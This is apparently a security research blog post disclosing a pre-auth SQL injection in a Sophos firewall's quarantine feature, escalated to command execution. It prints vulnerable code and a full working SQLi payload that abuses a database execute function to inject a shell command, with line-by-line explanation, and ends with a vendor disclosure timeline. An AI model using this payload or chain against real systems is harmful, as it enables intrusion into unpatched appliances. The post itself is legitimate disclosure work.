$iviewQuery= "select messageid,sender,recipient,subject,quarantinearea, destdomain,reason from (select messageid,sender,recipient,subject,quarantinearea, CAST(INET_NTOA(destdomain) as inet) as destdomain,0 as reason from tblquarantinespammailmerge where messageid='$hdnMessageidArr[$messagecnt]' and recipient='$hdnRecipientArr[$messagecnt]' UNION ALL select messageid,sender,recipient,subject,quarantinearea, destdomain,0 as reason from tblquarantinespammailmergev5 where messageid='$hdnMessageidArr[$messagecnt]' and recipient='$hdnRecipientArr[$messagecnt]' UNION ALL select messageid,sender,recipient,subject,quarantinearea, destdomain,reason from tblquarantinespammailmergev6 where messageid='$hdnMessageidArr[$messagecnt]' and recipient='$hdnRecipientArr[$messagecnt]') as tbl";

[...]

quarantinQuery = DLOPEN(iviewdb_query,iviewQuery)

$mailFrom = $quarantinQuery->{output}->{sender}[0];

$strSubject=$quarantinQuery->{output}->{subject}[0];

$file =$quarantinQuery->{output}->{quarantinearea}[0];

$mailTo = $quarantinQuery->{output}->{recipient}[0];

[...]

IF("$file =~/.eml/ || $file =~ /0x2/") {

#convert eml file to -H and -D files

newfile=EXEC /scripts/mail/convert_eml_to_H_D.pl '$file' '/sdisk/quarantine/'

<code>

chomp($newfile->{output});

$file= "/sdisk/spool/tmp/" . $newfile->{output};

</code>

LOG applog "new mail file: $newfile->{output}\n"

}

The question now was how the result set of the second SELECT statement could be manipulated through the result set of the first one. How about returning values in the first query that would trigger a SQLi in the second statement? Because the statement was built by string concatenation, this should have been possible in theory. Unfortunately, even after investing quite a bit of work in crafting such a payload, we were unable to obtain the desired results. A brief analysis of how our payload was processed revealed that it was escaped before reaching the second query. As it turned out, the reason was actually pretty obvious: since the function was triggered via a new CSC request, its parameters automatically passed through the previously described escape logic.

Time to accept our defeat and be happy with the boring SQLi? Not quite…

Desperately looking for other ways to weaponize the injection, we dug deeper into the involved components. At an earlier stage we had already created a full dump of the iviewdb database, but did not pay much attention to it after realizing that it did not contain any useful information. On revisiting the database, one feature that is heavily used by the appliance stood out: so-called user-defined functions.

User-defined functions extend the predefined database operations with your own SQL functions. They can be written in Postgres’ own procedural language, PL/pgSQL. What made such functions interesting for our attack was that previously defined functions could be called in-line in SELECT statements. The call syntax is the same as for any other SQL function, i.e. SELECT my_function(param1, param2) FROM table;.



The idea at this point was that one of the existing user-defined functions might allow the execution of stacked queries. This would be the case as soon as a function used one of its parameters in a SQL statement without proper filtering. Walking through the database dump revealed multiple code blocks matching this characteristic and, to our surprise, an even simpler way to execute arbitrary statements: the function execute. It expected a single parameter, which was executed directly as a SQL statement without any further checks.

CREATE FUNCTION execute(query text) RETURNS void

LANGUAGE plpgsql

AS $$

BEGIN

execute query;

EXCEPTION

WHEN OTHERS THEN

RAISE NOTICE 'Exception Occured while executing : %', query;

END

$$;

This function would, in theory, allow us to execute an INSERT statement inside the SELECT query of mergequarantine_manage. This could then be used to add rows to the table tblquarantinespammailmerge, which should later end up in the EXEC call in manage_quarantine.

Triggering an INSERT statement via the execute function from within a SELECT statement.
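As a rough analogy of this mechanism, the sketch below registers a function named execute in an in-memory SQLite database and calls it from inside a SELECT. This is an assumption-laden stand-in: it uses SQLite instead of PostgreSQL, and the Python function only records the statement it receives instead of running it. It merely shows that a function call embedded in a SELECT is evaluated, side effects included, while the query itself still returns an ordinary row.

```python
import sqlite3


def run_demo():
    conn = sqlite3.connect(":memory:")
    executed = []  # statements the stand-in function was asked to run

    def execute(query):
        # Stand-in for the PL/pgSQL function: record the statement and
        # return an empty string so it can be concatenated in the SELECT.
        executed.append(query)
        return ""

    # Make the Python function callable from SQL under the name "execute".
    conn.create_function("execute", 1, execute)

    row = conn.execute(
        "SELECT 'a' || execute('INSERT INTO t VALUES (1)') AS messageid"
    ).fetchone()
    conn.close()
    return row[0], executed


messageid, executed = run_demo()
print(messageid)  # a
print(executed)   # ['INSERT INTO t VALUES (1)']
```

The table name t and the INSERT statement are placeholders; in the real attack the nested statement is run by PL/pgSQL's execute inside the iviewdb database.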


After fiddling around for quite some time we were finally able to construct an appropriate payload (see below).

mode=2531&

release=<@base64_0>

hdnSender=s@s.com

&hdnRecipient=r@r.com&

hdnFilePath=

H' UNION SELECT

'a' || execute('

DELETE FROM tblquarantinespammailmerge where messageid = chr(97);

INSERT INTO tblquarantinespammailmerge(messageid,sender,recipient,subject,quarantinearea,destdomain) values(chr(97), chr(66), \'r@r.com\', chr(69), encode(decode(\'<@base64_1>; sleep 10; echo test.eml<@/base64_1>\', \'base64\'), \'escape\'), 1)

') as messageid,

'b' as reason,

'as' as isavas

UNION SELECT messageid,'b' as reason, 'c' as isavas FROM tblquarantinespammailmerge where quarantinearea='&hdnDestDomain=DESTDOMAIN

<@/base64_0>

Explanation:

- Line 1-2: Defining the two HTTP parameters needed for mode 2531.

- Line 3-6: Defining the three Base64 encoded parameters, that are needed to pass the initial checks in mergequarantine_manage.

- Line 7: Triggering the SQLi by injecting a single quote.

- Line 8-11: Utilizing the user-defined function execute in order to trigger different SQL operations than the predefined SELECT.

- Line 10: Adding a new row to the table tblquarantinespammailmerge that contains our code-execution payload in the field quarantinearea and sets messageid to ‘a’. Note the .eml portion inside the payload, which is required to reach the exec call.

- Line 9: Delete all rows from tblquarantinespammailmerge where the messageid equals ‘a’. This ensures that the table contains our payload only once (remember that the vector is injected 6x in the initial statement). While this is not strictly necessary, it simplifies the path taken after the SELECT statement in manage_quarantine and prevents our payload from being executed multiple times.

- Line 12-14: Needed to comply with the syntax of the predefined statement.

Using the above payload resulted in the following invocation of the Perl script:

newfile=EXEC /scripts/mail/convert_eml_to_H_D.pl '; sleep 10; echo test.eml' '/sdisk/quarantine/'

So finally our job was done… but there seemed to be no time delay, which indicated that our sleep had not actually been triggered. But why? Did we not use exactly the same execution mechanism as in the n-day? Turns out - not quite. Asnarök used EXECSH, whereas we had EXEC. Unfortunately, EXEC handles spaces in arguments correctly by passing each argument to the script as a single value.
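The difference can be illustrated with a small Python sketch. It assumes that EXECSH hands its command line to a shell, which the name suggests but which is not shown here, and that EXEC passes each argument as a separate argv element, as observed above. The helper names, the stand-in script and the payload are hypothetical, and the shell variant requires a POSIX shell.

```python
import subprocess
import sys

# Hypothetical stand-in for the called script: prints its first argument verbatim.
SCRIPT = [sys.executable, "-c", "import sys; print(sys.argv[1])"]


def run_as_argv(arg):
    # EXEC-like: the argument is one argv element and no shell ever parses it.
    result = subprocess.run(SCRIPT + [arg], capture_output=True, text=True)
    return result.stdout


def run_via_shell(arg):
    # EXECSH-like (assumed): the argument is spliced into a command line
    # that is then interpreted by the shell.
    result = subprocess.run("echo " + arg, shell=True, capture_output=True, text=True)
    return result.stdout


payload = "x; echo injected"
print(repr(run_as_argv(payload)))    # 'x; echo injected\n'
print(repr(run_via_shell(payload)))  # 'x\ninjected\n'
```

In the first case the semicolon is just another character of the argument; only in the second case does it terminate the command and start a new one.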

I assume we better bury our heads in the sand

We had come too far to give up now, so we carried on. Finally, we were able to execute code through the SQLi and it was good ol’ Perl which allowed us to do so.

[...]

my $emlfile=$ARGV[1] ."/" . $ARGV[0];

my $detailio = new IO::Handle;

open($detailio, ">>$filewritingdata") or die("Cannot write $filewritingdata: $!\n");

[...]

my $emlio = new IO::Handle;

open($emlio, $emlfile) or

die("Cannot write $emlfile: $!\n");

Adding this last piece to the attack chain and fixing a minor issue in the posted payload is left up to the reader.

Triggering a reverse shell by abusing the discovered vulnerability.


Timeline

- 04.05.2020 - 22:48 UTC: Vulnerability reported to Sophos via BugCrowd.

- 04.05.2020 - 23:56 UTC: First reaction from Sophos confirming the report receipt.

- 05.05.2020 - 12:23 UTC: Message from Sophos that they were able to reproduce the issue and are working on a fix.

- 05.05.2020: Roll out of a first automatic hotfix by Sophos.

- 16.05.2020 - 23:55 UTC: Reported a possible bypass for the security measures added in the hotfix.

- 21.05.2020: Second hotfix released by Sophos which disables the pre-auth email quarantine release feature.

- June 2020: Release of firmware 18.0 MR1-1 which contains a built-in fix.

- July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.

- 13.07.2020: Release of the blog post in agreement with the vendor after ensuring that the majority of devices had received either the hotfix or the new firmware version.

We highly appreciate the quick response times, very friendly communication as well as the hotfix feature.